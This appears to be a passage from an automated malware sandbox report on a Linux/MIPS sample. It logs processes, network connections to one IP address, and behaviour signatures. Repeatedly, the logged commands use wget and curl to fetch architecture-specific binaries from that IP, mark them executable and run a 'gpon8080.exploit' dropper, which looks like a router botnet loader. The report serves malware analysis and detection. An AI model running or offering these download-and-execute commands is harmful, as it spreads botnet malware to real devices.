/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/bin/cat
[cat m3th.sh4]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/bin/cat
[cat m3th.arc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 11:10
Platform
debian9-mipsel-20240729-en
Max time kernel
92s
Max time network
93s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/bin/cat
[cat m3th.i686]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/bin/cat
[cat m3th.sh4]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/bin/cat
[cat m3th.arc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |